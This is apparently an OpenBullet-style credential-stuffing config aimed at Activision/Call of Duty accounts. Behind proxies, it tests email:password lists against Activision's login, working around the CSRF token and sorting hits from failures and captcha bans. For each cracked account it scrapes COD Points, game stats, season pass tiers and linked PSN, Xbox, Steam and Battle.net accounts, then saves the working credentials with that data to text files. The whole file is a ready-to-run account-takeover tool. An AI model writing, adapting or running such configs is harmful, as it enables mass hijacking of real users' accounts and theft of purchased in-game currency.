[SETTINGS]
{
  "Name": "Call of Duty V7 Cold War",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2021-04-01T18:43:18.1710586-07:00",
  "AdditionalInfo": "Ricking#3224",
  "RequiredPlugins": [],
  "Author": "Ricking#3224",
  "Version": "1.1.0 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "Ricking#3224",
      "VariableName": "",
      "Id": 1708716417
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://s.activision.com/activision/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "name=\"_csrf\" content=\"" "\"/>" -> VAR "_csrf" 

REQUEST POST "https://s.activision.com/do_login?new_SiteId=activision" 
  CONTENT "username=<USER>&remember_me=true&password=<PASS>&_csrf=<_csrf>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9,fr;q=0.8,ar;q=0.7" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 145" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Host: s.activision.com" 
  HEADER "Origin: https://s.activision.com" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://s.activision.com/activision/login" 
  HEADER "sec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<COOKIES(*)>" Contains "LOGIN_FAILURE" 
    KEY "<COOKIES{*}>" Contains "LOGIN_FAILURE" 
    KEY "<RESPONSECODE>" EqualTo "302" 
  KEYCHAIN Success OR 
    KEY "<COOKIES(*)>" Contains "atkn" 
    KEY "<COOKIES{*}>" Contains "atkn" 
  KEYCHAIN Ban OR 
    KEY "Captcha error. Please try again.</" 

REQUEST GET "https://my.callofduty.com/api/papi-client/crm/cod/v2/identities/<COOKIES(ACT_SSO_COOKIE)>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#US PARSE "<SOURCE>" JSON "username" -> VAR "US" 

#g PARSE "<SOURCE>" JSON "title" Recursive=TRUE -> VAR "Games1" 

#Games FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "wwii" VALUE "COD WWII" 
  KEY "bo4" VALUE "COD Black Ops4" 
  KEY "mw" VALUE "COD Modern Warfare" 
  KEY "cw" VALUE "COD Cold War" 
  "<Games1>" -> CAP "Games" 

#p PARSE "<SOURCE>" JSON "platform" Recursive=TRUE -> VAR "P" 

#Platforms FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "xbl" VALUE "Xbox" 
  KEY "psn" VALUE "Psn" 
  KEY "battle" VALUE "Blizzard" 
  KEY "steam" VALUE "Steam" 
  "<P>" -> CAP "Platforms" 

#p2 PARSE "<SOURCE>" JSON "platform" -> VAR "p2" 

#Stats REQUEST GET "https://my.callofduty.com/api/papi-client/stats/cod/v1/title/cw/platform/<p2>/gamer/<US>/profile/type/wz" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#LVL PARSE "<SOURCE>" JSON "level" CreateEmpty=FALSE -> CAP "Level" 

#Prestige PARSE "<SOURCE>" JSON "prestige" CreateEmpty=FALSE -> CAP "Prestige" 

#K/D_Ratio PARSE "<SOURCE>" JSON "kdratio" CreateEmpty=FALSE -> CAP "KDRatio" 

#Kills PARSE "<SOURCE>" JSON "kills" CreateEmpty=FALSE -> CAP "Kills" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<Kills>" Contains "0" 

#WZStats REQUEST GET "https://my.callofduty.com/api/papi-client/stats/cod/v1/title/mw/platform/<p2>/gamer/<US>/profile/type/mw" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#wz PARSE "<SOURCE>" LR "\"br\":{\"properties\":" ",\"hc_sd\":{\"properties\":" -> VAR "wzstats" 

#wzwins PARSE "<wzstats>" LR "wins\":" "," CreateEmpty=FALSE -> CAP "wzwins" 

#wzkills PARSE "<wzstats>" LR "kills\":" "," CreateEmpty=FALSE -> CAP "wzkills" 

#wzkd PARSE "<wzstats>" LR "kdRatio\":" "," CreateEmpty=FALSE -> CAP "wzkd" 

REQUEST GET "https://www.callofduty.com/api/papi-client/inventory/v1/title/mw/platform/<p2>/gamer/<US>/currency" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CP PARSE "<SOURCE>" JSON "codPoints" CreateEmpty=FALSE -> CAP "Cod Points" 

#GET_SEASONS REQUEST GET "https://www.callofduty.com/api/papi-client/loot/title/mw/platform/<p2>/gamer/<US>/status/en" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#SEASON_1 PARSE "<SOURCE>" LR "loot_season_1" "}" -> VAR "1" 

#SEASON1_PREMIUM PARSE "<1>" LR "premium\":" "" CreateEmpty=FALSE -> CAP "S1 Premium" 

#SEASON1_TIER PARSE "<1>" LR "tier\":" "," CreateEmpty=FALSE -> CAP "S1 Tier" 

#SEASON2 PARSE "<SOURCE>" LR "loot_season_2" "}" -> VAR "2" 

#SEASON2_PREMIUM PARSE "<2>" LR "premium\":" "" CreateEmpty=FALSE -> CAP "S2 Premium" 

#SEASON2_TIER PARSE "<2>" LR "tier\":" "," CreateEmpty=FALSE -> CAP "S2 Tier" 

#SEASON3 PARSE "<SOURCE>" LR "loot_season_3" "}" -> VAR "3" 

#SEASON3_PREMIUM PARSE "<3>" LR "premium\":" "" CreateEmpty=FALSE -> CAP "S3 Premium" 

#SEASON3_TIER PARSE "<3>" LR "tier\":" "," CreateEmpty=FALSE -> CAP "S3 Tier" 

#SEASON4 PARSE "<SOURCE>" LR "loot_season_4" "}" -> VAR "4" 

#SEASON4_PREMIUM PARSE "<4>" LR "premium\":" "" CreateEmpty=FALSE -> CAP "S4 Premium" 

#SEASON4_TIER PARSE "<4>" LR "tier\":" "," CreateEmpty=FALSE -> CAP "S4 Tier" 

#SEASON5 PARSE "<SOURCE>" LR "loot_season_5" "}" -> VAR "5" 

#SEASON5_PREMIUM PARSE "<5>" LR "premium\":" "" CreateEmpty=FALSE -> CAP "S5 Premium" 

#SEASON5_TIER PARSE "<5>" LR "tier\":" "," CreateEmpty=FALSE -> CAP "S5 Tier" 

#SEASON6 PARSE "<SOURCE>" LR "loot_season_6" "}" -> VAR "6" 

#SEASON6_PREMIUM PARSE "<6>" LR "premium\":" "" CreateEmpty=FALSE -> CAP "S6 Premium" 

#SEASON6_TIER PARSE "<6>" LR "tier\":" "," CreateEmpty=FALSE -> CAP "S6 Tier" 

#GET_LINK REQUEST GET "https://profile.callofduty.com/cod/profile" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#PSN PARSE "<SOURCE>" LR "Playstation Account: " "</span>" CreateEmpty=FALSE -> CAP "PSN" 

#BLLIZARD PARSE "<SOURCE>" LR "Battle.net Account: " "</span" CreateEmpty=FALSE -> CAP "BLLIZARD" 

#XBOX PARSE "<SOURCE>" LR "XBOX Live Account: " "</span" CreateEmpty=FALSE -> CAP "XBOX" 

#STEAM PARSE "<SOURCE>" LR "Steam Account: " "</span" CreateEmpty=FALSE -> CAP "STEAM" 

#Accounts UTILITY File "CWAccounts.txt" AppendLines "| <USER>:<PASS> | CodPoints = <Cod Points> | Prestige = <Prestige> | CWLevel = <Level> | CWK/D = <KDRatio> | CWKills = <Kills> | WZK/D = <wzkd> | WZKills = <wzkills> | BRWins = <wzwins> | S1Premium = <S1 Premium> | S1Tier = <S1 Tier> | S2Premium = <S2 Premium> | S2Tier = <S2 Tier> | S3Premium = <S3 Premium> | S3Tier = <S3 Tier> | Games = <Games> | Platforms = <p2> | Username = <US> |" 

#Cod_Point_Accounts UTILITY File "CWCodpoints.txt" AppendLines "| <USER>:<PASS> | CodPoints = <Cod Points> |" 

#Level_Accounts UTILITY File "CWLevel.txt" AppendLines "| <USER>:<PASS> | CWLevel = <Level> | Prestige = <Prestige> |" 

#K/D_Kill_Accounts UTILITY File "CWKDnKills.txt" AppendLines "| <USER>:<PASS> | CWK/D = <KDRatio> | CWKills = <Kills> |" 

#WZ_Accounts UTILITY File "WZstats.txt" AppendLines "| <USER>:<PASS> | WZK/D = <wzkd> | WZKills = <wzkills> | BRWins = <wzwins> |" 

#Season_Accounts UTILITY File "CWSeasons.txt" AppendLines "| <USER>:<PASS> | S1Premium = <S1 Premium> | S1Tier = <S1 Tier> | S2Premium = <S2 Premium> | S2Tier = <S2 Tier> | S3Premium = <S3 Premium> | S3Tier = <S3 Tier> | S4Premium = <S4 Premium> | S4Tier = <S4 Tier> | S5Premium = <S5 Premium> | S5Tier = <S5 Tier> | S6Premium = <S6 Premium> | S6Tier = <S6 Tier> | S7Premium = <S7 Premium> | S7Tier = <S7 Tier> |" 

